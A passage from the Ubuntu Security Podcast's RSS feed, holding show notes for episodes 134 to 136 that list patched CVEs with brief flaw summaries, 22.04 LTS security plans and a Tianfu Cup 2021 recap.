</ul>
</li>
<li>Usual web engine vulns - plus one in the bubblewrap launcher which allows
a limited sandbox bypass - could trick host processors into believing a
sandboxed process was not and hence could potentially escalate privs</li>
</ul>
<h3 id="usn-5128-1-ceph-vulnerabilities-09-35">[<a href="https://ubuntu.com/security/notices/USN-5128-1">USN-5128-1</a>] Ceph vulnerabilities [09:35]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3531">CVE-2021-3531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3524">CVE-2021-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3509">CVE-2021-3509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20288">CVE-2021-20288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27781">CVE-2020-27781</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="22-dot-04-lts-development-cycle-begins-09-46">22.04 LTS development cycle begins [09:46]</h3>
<ul>
<li>Will include all the features from the various interim releases since the
last 20.04 LTS plus some more</li>
<li>Since is an LTS, this cycle is mostly to be spent making things as solid
and stable as possible, but a few new features are planned:
<ul>
<li>nftables supported
<ul>
<li>firewalling on Linux has 2 components - kernel-space mechanism and
userspace tooling to control that</li>
<li>traditionally kernel supported iptables (aka xtables - ip,ip6,arp,eb -tables)</li>
<li>nftables as introduced into the kernel in 3.13 as a new mechanism to
implement network packet classification and handling - aka firewalling
etc</li>
<li>kernel has 2 mechanisms then - xtables and nftables</li>
<li>userspace then has 2 primary tools for handling these - iptables for
xtables and nftables (nft) for nftables</li>
<li>iptables userspace added a nft backend so existing iptables rules and
users would be switched to that automatically -  was already switched to
use nft backend in Ubuntu 21.04</li>
<li>now want to support the nftables userspace package for handling
nftables as a first class system</li>
<li>also look at implementing a <code>nftables</code> backend in <code>ufw</code> so it can drive
<code>nftables</code> directly rather than <code>iptables</code></li>
</ul>
</li>
<li>Improvements to OVAL data
<ul>
<li>Improved information around ESM products etc</li>
</ul>
</li>
<li>Improved handling of <code>pivot_root</code> in AppArmor
<ul>
<li>Upstream issue <a href="https://gitlab.com/apparmor/apparmor/-/issues/113">https://gitlab.com/apparmor/apparmor/-/issues/113</a></li>
<li>once a <code>pivot_root</code> occurs, AppArmor loses track of the original paths so
if a root level process is granted <code>pivot_root</code> permission, can move
around inside it&rsquo;s own mount namespace to be able to escape outside the
AppArmor policy</li>
<li>AppArmor needs to track root before and after and allow to specify
policy both pre-and-post</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="hiring-14-46">Hiring [14:46]</h3>
<h4 id="security-product-manager">Security - Product Manager</h4>
<ul>
<li>HOME BASED - EMEA (Europe, Middle East, Africa)</li>
<li>Role includes:
<ul>
<li>guiding the evolution of security offerings from Canonical and Ubuntu</li>
<li>driving compliance and certification of Ubuntu</li>
<li>engaging with the open source security community</li>
<li>telling the story of Canonical&rsquo;s work to deliver secure platforms</li>
</ul>
</li>
<li><a href="https://canonical.com/careers/2278145/security-product-manager-remote">https://canonical.com/careers/2278145/security-product-manager-remote</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E136.mp3" length="12441656" type="audio/mpeg" /><itunes:duration>16:11</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 135
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-135/</link>
          <pubDate>Fri, 22 Oct 2021 14:51:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>32f8190b01c40c620025da2d4df15636208c8728b25e10afb830cf123d6fb5df88a73581388ee3c82e7b96ea0f7f00b2fb20cce5404c49a4229f6853b8d921cd</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 135</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security
  updates for Linux kernel, nginx, Ardour and strongSwan.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security
  updates for Linux kernel, nginx, Ardour and strongSwan.
  </itunes:summary>
        <description>  Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security
  updates for Linux kernel, nginx, Ardour and strongSwan.
  </description>
        <googleplay:description>  Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security
  updates for Linux kernel, nginx, Ardour and strongSwan.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu 20.04 LTS targeted at Tianfu Cup 2021 plus we cover security
updates for Linux kernel, nginx, Ardour and strongSwan.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-5091-3-linux-kernel--azure--regression">[<a href="https://ubuntu.com/security/notices/USN-5091-3">USN-5091-3</a>] Linux kernel (Azure) regression</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37576">CVE-2021-37576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33624">CVE-2021-33624</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5092-3-linux-kernel--azure--regression-00-50">[<a href="https://ubuntu.com/security/notices/USN-5092-3">USN-5092-3</a>] Linux kernel (Azure) regression [00:50]</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38201">CVE-2021-38201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37576">CVE-2021-37576</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35477">CVE-2021-35477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34556">CVE-2021-34556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33624">CVE-2021-33624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41073">CVE-2021-41073</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failure to boot on large Azure instance types - caused by a patch that
got backported to the 5.14 upstream stable kernel that was purported to
head off possible future problems, but itself caused issues on say the
<code>Standard_D48_v3</code> instance (48 vCPUs, 192GB RAM, 1.2TB storage) - dropped
that patch to resolve the issue</li>
</ul>
<h3 id="usn-5109-1-nginx-vulnerability-01-44">[<a href="https://ubuntu.com/security/notices/USN-5109-1">USN-5109-1</a>] nginx vulnerability [01:44]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-20005">CVE-2017-20005</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow when handling files with modification dates a long time
in the past - ie. 1969 or very far in the future - integer overflow in
the autoindex module</li>
</ul>
<h3 id="usn-5110-1-ardour-vulnerability-02-22">[<a href="https://ubuntu.com/security/notices/USN-5110-1">USN-5110-1</a>] Ardour vulnerability [02:22]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-22617">CVE-2020-22617</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in handling of crafted XML files - if using attacker provided files
could DoS / RCE</li>
</ul>
<h3 id="usn-5111-1-usn-5111-2-strongswan-vulnerabilities-02-39">[<a href="https://ubuntu.com/security/notices/USN-5111-1">USN-5111-1</a>, <a href="https://ubuntu.com/security/notices/USN-5111-2">USN-5111-2</a>] strongSwan vulnerabilities [02:39]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)</li>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41991">CVE-2021-41991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41990">CVE-2021-41990</a> <!-- raw HTML omitted --> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow when replacing certs in cache - if can send many
requests with different certs can fill cache and then cause replacement
of cache entries when gets full - LRU algorithm could then cause integer
overflow and hence OOB write as a result</li>
<li>Integer overflow in gmp plugin - crafted RSASSA-PSS signature in say a
self-signed CA cert sent by an initiation</li>
</ul>
<h3 id="usn-5113-1-linux-kernel-vulnerabilities-04-13">[<a href="https://ubuntu.com/security/notices/USN-5113-1">USN-5113-1</a>] Linux kernel vulnerabilities [04:13]</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42008">CVE-2021-42008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38166">CVE-2021-38166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3743">CVE-2021-3743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3739">CVE-2021-3739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3702">CVE-2020-3702</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11 hirsute kernel (20.04 HWE)</li>
<li>overlayfs perms handling issue, race condition -&gt; OOB read in VT
subsystem, integer overflow in hashtable implementation in BPF, ext4
xattrs race -&gt; UAF, ath9k race condition -&gt; info leak</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="tianfu-cup-2021-05-30">Tianfu Cup 2021 [05:30]</h3>
<ul>
<li><a href="https://www.tianfucup.com/en">https://www.tianfucup.com/en</a></li>
<li>16-17th October - China&rsquo;s own Pwn2Own</li>
<li>Teams required to use original vulns to hack target platforms - 1.5m USD
total reward</li>
<li>Targets
<ul>
<li>Docker-CE on Ubuntu 20.04 w generic kernel running a Ubuntu 20.04
desktop container with ssh access as root to the container running
unprivileged w/o uidmap, volume mount and default bridge network - 60k
USD price</li>
<li>Ubuntu 20.04 / Centos 8 running in VMWare Workstation - unprivileged
user to escalate to root - 40k USD</li>
<li>Ubuntu + qemu-kvm - 20.04 desktop host, running 20.04 server in qemu -
VM escape w/o sandbox escape - 60k USD, w/ sandbox escape 150k USD</li>
</ul>
</li>
<li>3 5 minute attempts to run their exploits</li>
<li>According <a href="https://therecord.media/windows-10-ios-15-ubuntu-chrome-fall-at-chinas-tianfu-hacking-contest/">to</a> <a href="https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html">media</a> <a href="https://securityaffairs.co/wordpress/123476/hacking/tianfu-cup-2021-hacking-contest.html">reports</a> - Ubuntu 20.04 root privesc - 4 times,
Docker-CE and qemu VM - once</li>
<li>Also iPhone 13 Pro was hacked using a no-interaction RCE attack, plus
Google Chrome to get kernel privesc on Windows as well</li>
<li>Also according to one media outlet &ldquo;details unknown but vendors are
expected to release patches in coming weeks&rdquo; - so far no contact /
details have been provided to us&hellip;</li>
<li>Same has happened in previous years - no details get provided to vendors
so issues don&rsquo;t get patched - in the past, exploits which have been
showcased at Tianfu have then <a href="https://www.technologyreview.com/2021/05/06/1024621/china-apple-spy-uyghur-hacker-tianfu/">allegedly</a> gone on to be used in hacking
campaigns by the Chinese government</li>
<li>Contrast with Pwn2Own - we are invited by organisers to watch and verify
attempts in real-time to help judge whether exploits used are actually
unique and new, and then ZDI provide details immediately regarding the
vulns along with PoCs so we can patch them ASAP</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E135.mp3" length="9298436" type="audio/mpeg" /><itunes:duration>11:43</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 134
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-134/</link>
          <pubDate>Fri, 15 Oct 2021 14:47:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>f0f5b2ab6dd3ea3d12c964cfbd609e22d3c49627e4e0312a7ebb1653c74dd82977b2285b61f64386a0947ee3c89baa9099049c1cd1b6e21400c33fbfb2552d15H</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 134</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        It's release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>It's release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.</itunes:summary>
        <description>It's release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.</description>
        <googleplay:description>It's release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s release week! As Ubuntu 21.10 Impish Indri is released we take a look at some of the new security features it brings, plus we cover security updates for containerd, MongoDB, Mercurial, docker.io and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>58 unique CVEs addressed</p>
<h3 id="usn-5095-1-apache-commons-io-vulnerability-00-46">[<a href="https://ubuntu.com/security/notices/USN-5095-1">USN-5095-1</a>] Apache Commons IO vulnerability [00:46]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29425">CVE-2021-29425</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly sanitize filenames in <code>FileNameUtils.normalize()</code> -
should remove relative path components like <code>../</code> but if contained leading
double-slashes this would fail - and the original path would be returned
without alteration - so could then possibly get relative directory
traversal to the parent directory depending on how this returned value
was used.</li>
</ul>
<h3 id="usn-5096-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5096-1">USN-5096-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-40490">CVE-2021-40490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38203">CVE-2021-38203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38202">CVE-2021-38202</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38201">CVE-2021-38201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38166">CVE-2021-38166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-37159">CVE-2021-37159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-35477">CVE-2021-35477</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34556">CVE-2021-34556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41073">CVE-2021-41073</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5091-2-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5091-2">USN-5091-2</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33624">CVE-2021-33624</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5094-2-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5094-2">USN-5094-2</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38205">CVE-2021-38205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3732">CVE-2021-3732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5106-1-linux-kernel--oem--vulnerabilities-01-36">[<a href="https://ubuntu.com/security/notices/USN-5106-1">USN-5106-1</a>] Linux kernel (OEM) vulnerabilities [01:36]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-38199">CVE-2021-38199</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38160">CVE-2021-38160</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22543">CVE-2021-22543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26541">CVE-2020-26541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41073">CVE-2021-41073</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>io_uring</code> (5.1) - unprivileged user - trigger free of other kernel
memory - code execution</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-133/">Episode 133</a></li>
</ul>
<h3 id="usn-4973-2-python-vulnerability-02-18">[<a href="https://ubuntu.com/security/notices/USN-4973-2">USN-4973-2</a>] Python vulnerability [02:18]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29921">CVE-2021-29921</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ipaddress with octal encoded numbers vuln previously fixed but the patch
with this fix got dropped in an intervening SRU where 3.8.10 got
backported to 20.04 (<a href="https://bugs.launchpad.net/ubuntu/groovy/+source/python3.8/+bug/1928057">LP: #1928057</a>)</li>
</ul>
<h3 id="usn-5099-1-imlib2-vulnerability-03-11">[<a href="https://ubuntu.com/security/notices/USN-5099-1">USN-5099-1</a>] Imlib2 vulnerability [03:11]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12761">CVE-2020-12761</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>integer overflow -&gt; OOB read - ICO file with an excessive amount of
colors declared in its color map - fixed to error out in this case</li>
</ul>
<h3 id="usn-5100-1-containerd-vulnerability-03-43">[<a href="https://ubuntu.com/security/notices/USN-5100-1">USN-5100-1</a>] containerd vulnerability [03:43]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41103">CVE-2021-41103</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>container bundles root dirs and plugins had excessive permissions -
allows an unprivileged Linux user to traverse directory contents and
execute programs in these dirs. If a container image was created with
setuid executables then that user on the Linux host could execute these
setuid binaries and gain root privileges on the host.</li>
</ul>
<h3 id="usn-5101-1-mongodb-vulnerability-04-34">[<a href="https://ubuntu.com/security/notices/USN-5101-1">USN-5101-1</a>] MongoDB vulnerability [04:34]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20925">CVE-2019-20925</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Unauthenticated client can send crafted messages to the server which
specify a negative size when decompressed - an insufficient amount of
memory would then get allocated and lead to a possible OOB write</li>
<li>Thanks to Heather Lemon from Sustaining Engineering team for preparing
this update</li>
</ul>
<h3 id="usn-5102-1-mercurial-vulnerabilities-05-10">[<a href="https://ubuntu.com/security/notices/USN-5102-1">USN-5102-1</a>] Mercurial vulnerabilities [05:10]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17983">CVE-2018-17983</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3902">CVE-2019-3902</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandled symlinks in subrepos - defeats usual path-checking logic and
so could could allow an attacker to write arbitrary files to the victim&rsquo;s
filesystem outside the repo</li>
<li>OOB read when parsing malformed manifest entries</li>
</ul>
<h3 id="usn-5097-1-ledgersmb-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5097-1">USN-5097-1</a>] LedgerSMB vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3731">CVE-2021-3731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3694">CVE-2021-3694</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3693">CVE-2021-3693</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5098-1-bl-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5098-1">USN-5098-1</a>] bl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8244">CVE-2020-8244</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5103-1-docker-dot-io-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5103-1">USN-5103-1</a>] docker.io vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-41089">CVE-2021-41089</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><code>docker cp</code> - could craft a container image that would result in <code>docker cp</code>
making changes to existing files on the host filesystem - doesn&rsquo;t
actually allow to read/modify or execute files on the host but could make
them readable/change perms etc and expose info on the host</li>
</ul>
<h3 id="usn-5104-1-squid-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5104-1">USN-5104-1</a>] Squid vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-28116">CVE-2021-28116</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5105-1-bottle-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5105-1">USN-5105-1</a>] Bottle vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28473">CVE-2020-28473</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5022-3-mysql-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5022-3">USN-5022-3</a>] MySQL vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-2390">CVE-2021-2390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2389">CVE-2021-2389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2385">CVE-2021-2385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2372">CVE-2021-2372</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2342">CVE-2021-2342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2307">CVE-2021-2307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2226">CVE-2021-2226</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2194">CVE-2021-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2180">CVE-2021-2180</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2179">CVE-2021-2179</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2171">CVE-2021-2171</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2169">CVE-2021-2169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2166">CVE-2021-2166</a> <!-- raw HTML omitted --></li>
